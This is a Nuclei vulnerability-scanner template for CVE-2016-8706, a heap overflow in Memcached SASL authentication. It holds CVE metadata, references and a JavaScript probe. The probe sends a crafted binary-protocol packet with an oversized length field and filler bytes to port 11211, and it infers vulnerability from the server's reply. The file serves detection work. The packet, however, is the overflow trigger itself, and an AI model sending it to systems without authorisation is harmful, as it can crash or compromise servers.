nuclei-templates/javascript/cves/2016/CVE-2016-8706.yaml

57 lines
1.9 KiB
YAML
Raw Normal View History

2023-10-30 08:06:00 +00:00
id: CVE-2016-8706
2023-11-13 10:33:23 +00:00
2023-10-30 08:06:00 +00:00
info:
2023-11-14 05:53:08 +00:00
name: Memcached Server SASL Authentication - Remote Code Execution
2023-10-30 08:06:00 +00:00
author: pussycat0x
severity: high
2023-11-13 10:33:23 +00:00
description: |
An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.
2023-10-30 08:06:00 +00:00
reference:
- https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py
- https://nvd.nist.gov/vuln/detail/CVE-2016-8706
- http://rhn.redhat.com/errata/RHSA-2016-2819.html
- http://www.debian.org/security/2016/dsa-3704
- http://www.securitytracker.com/id/1037333
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2016-8706
cwe-id: CWE-190
epss-score: 0.91612
epss-percentile: 0.9865
cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*
2023-10-30 08:06:00 +00:00
metadata:
max-request: 1
vendor: memcached
product: memcached
2023-11-13 10:33:23 +00:00
verfied: true
2023-10-30 08:06:00 +00:00
tags: cve,cve2016,rce,js,memcached
javascript:
- code: |
let packet = bytes.NewBuffer();
packet.Write(new Uint8Array([0x80, 0x21]))
let cmd = 'stats'
packet.WriteString(cmd)
packet.Pack("!H", [32]);
packet.Pack("!I", [1]);
let buzz = Array(1000).fill("A").join('');
packet.WriteString(buzz)
const c = require("nuclei/net");
let conn = c.Open('tcp', `${Host}:${Port}`);
conn.SendHex(packet.Hex());
conn.RecvString();
args:
Host: "{{Host}}"
Port: 11211
matchers-condition: and
matchers:
- type: word
words:
- "Invalid arguments"
- type: word
words:
- "Auth failure"
negative: true
# digest: 490a004630440220679c0fed3309ef12d46db2927b7aa6d9934c5b2ce37560aa32edd8145bcb3176022019a2e1bc0a2ffec8ad9b0f617f906a74d520ea7dd8c53dccebc8ab03a57549dc:922c64590222798bb761d5b6d8e72950